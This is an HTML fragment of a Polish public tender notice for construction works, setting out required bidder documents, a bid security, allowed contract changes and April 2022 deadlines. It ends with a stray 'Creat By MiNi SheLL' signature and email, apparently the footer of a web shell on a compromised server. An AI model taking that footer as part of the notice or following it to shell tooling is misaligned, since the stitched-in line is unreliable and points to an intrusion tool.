zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>5.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Rozdziale VII ust. 1.1 i .1.2. – sporządzone według wzoru stanowiącego Załącznik nr 5 do SWZ;<br/>6.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej– sporządzone według wzoru stanowiącego Załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Dokumenty potwierdzające, że Wykonawca jest ubezpieczony (posiada polisę lub inny dokument ubezpieczenia) od odpowiedzialności cywilnej na kwotę nie niższą niż 400 000,00-zł <br/>3.	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone - Załącznik nr 6 do SWZ.<br/>Dowodami, o których wyżej mowa, są:<br/>•	referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego robót były wykonywane, z tym że w odniesieniu do nadal wykonywanych robót okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;<br/>•	oświadczenie Wykonawcy — jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać referencji bądź innych dokumentów, o których wyżej mowa.<br/>4.	Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego - kierowania robotami budowlanymi posiadających uprawnienia budowlane w specjalności drogowej, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego oraz informację o podstawie do dysponowania tymi osobami potwierdzające spełnienie warunków określonych w rozdziale VI SWZ – sporządzony według wzoru stanowiącego Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>5 200/00 złotych (pięć tysięcy dwieście złotych i 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt. 2 i 3 PZP.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na nr konta Zamawiającego Bank Handlowy w Warszawie S.A. Nr 79 1030 1508 0000 0005 5088 4054, z dopiskiem na przelewie: „Wadium w postępowaniu nr 29/KT/2022/W”. Za termin wniesienia wadium w formie pieniądza uważa się termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest Zamawiający; <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>6.	Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Zasady zwrotu wadium oraz okoliczności jego zatrzymania reguluje art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunków dotyczących zdolności technicznej lub zawodowej dopuszcza łączenie spełnienia warunku udziału przez Wykonawców.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczalna jest zmiana przedmiotu zamówienia poprzez zmianę zakresu robót budowlanych przewidzianych w dokumentacji o której mowa w § 1 w przypadku:<br/>1)	Konieczności wykonania robót zamiennych, których wykonanie ma na celu prawidłowe zrealizowanie przedmiotu zamówienia, a konieczność ich wykonania wynika z wad dokumentacji o której mowa w § 1.<br/>2)	Konieczności wykonania robót zamiennych, niezbędnych do prawidłowego wykonania przedmiotu Umowy, które nie zostały przewidziane w dokumentacji o której mowa w § 1.<br/>3)	Zmiany dokumentacji o której mowa w § 1 wykonane z inicjatywy Zamawiającego ze względu na stwierdzone wady, co spowoduje konieczność wykonania robót zamiennych.<br/>4)	Wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych niż te wskazane przez Zamawiającego w dokumentacji o której mowa w § 1, powodujących konieczność zmiany sposobu wykonania Umowy.<br/>5)	Wystąpienia na terenie budowy niewybuchów, niewypałów lub znalezisk archeologicznych, które uniemożliwiają lub utrudniają wykonanie robót na warunkach przewidzianych w Umowie.<br/>2.	Dopuszczalna jest zmiana zakresu robót budowlanych poprzez ich ograniczenie w sytuacji, gdy wykonanie niektórych robót okazało się zbędne, zmieniły się okoliczności związane z wykonaniem Umowy lub wykonanie poszczególnych robót nie leży w interesie publicznym lub Zamawiającego, z zastrzeżeniem, że zakres robót nie może ulec zmianie o więcej niż 10% zakresu rzeczowego lub finansowego przedmiotu zamówienia. <br/>3.	Wynagrodzenie Wykonawcy zimniejsza się odpowiednio w stosunku do zmniejszonego zakresu robót z uwzględnieniem mechanizmu opisanego w ust. 1 i 2 Umowy.<br/>4.	Dopuszczalna jest zmiana technologii wykonania robót lub materiałów przewidzianych w dokumentacji o której mowa w § 1 w przypadku niedostępności odpowiednich surowców lub materiałów na rynku budowlanym albo zaniechania produkcji materiałów przewidzianych w w/w dokumentacji, co utrudnia możliwość wykonania przedmiotu Umowy, tj. w szczególności powoduje opóźnienie w postępie robót, a Wykonawca pomimo zachowania należytej staranności, nie mógł temu zapobiec. <br/>5.	Dopuszczalna jest zmiana terminu wykonania Umowy w przypadku:<br/>a)	Wystąpienia niemożliwych do przewidzenia warunków atmosferycznych, co spowodowało brak możliwości kontynuowania robót (wstrzymanie wykonania robót). Poprzez niemożliwe do przewidzenia warunki atmosferyczne należy rozumieć utrzymujące się przez okres 1 tygodnia warunki odmienne od warunków atmosferycznych występujących na terenie budowy w danym miesiącu w ostatnich 5 latach liczonych od dnia upływu terminu składania ofert.<br/>b)	Opóźnienia innych inwestycji lub robót budowlanych prowadzonych przez Zamawiającego lub innych zamawiających, które to inwestycje lub roboty kolidują z wykonaniem robót objętych umową, co uniemożliwia Wykonawcy terminowe wykonanie Umowy<br/>c)	Opóźnienia Zamawiającego w wykonaniu jego zobowiązań wynikających z Umowy lub przepisów powszechnie obowiązującego prawa, co uniemożliwia Wykonawcy terminowe wykonanie Umowy<br/>d)	Opóźnienia organów administracji publicznej w wydaniu decyzji administracyjnej, uzgodnień lub innych aktów administracyjnych, których wydanie jest niezbędne do dalszego wykonywania robót przez Wykonawcę, a opóźnienie organów nie wynika z przyczyn leżących po stronie Wykonawcy<br/>e)	Opóźnienia w uzyskaniu wymaganych uzgodnień, opinii, aprobat od podmiotów trzecich, które to opóźnienie powstało z przyczyn nieleżących po stronie Wykonawcy, a powoduje brak możliwości wykonania robót, co ma wpływ na termin wykonania Umowy<br/>f)	Wstrzymanie wykonania Umowy przez Zamawiającego z przyczyn nieleżących po stronie Wykonawcy, o ile takie działanie powoduje, że nie jest możliwe wykonanie umowy w dotychczas ustalonym terminie<br/>g)	Wystąpienia na terenie budowy niewybuchów, niewypałów lub znalezisk archeologicznych, które wymagały ws(.....) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ePUAP: /zgnbielany/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com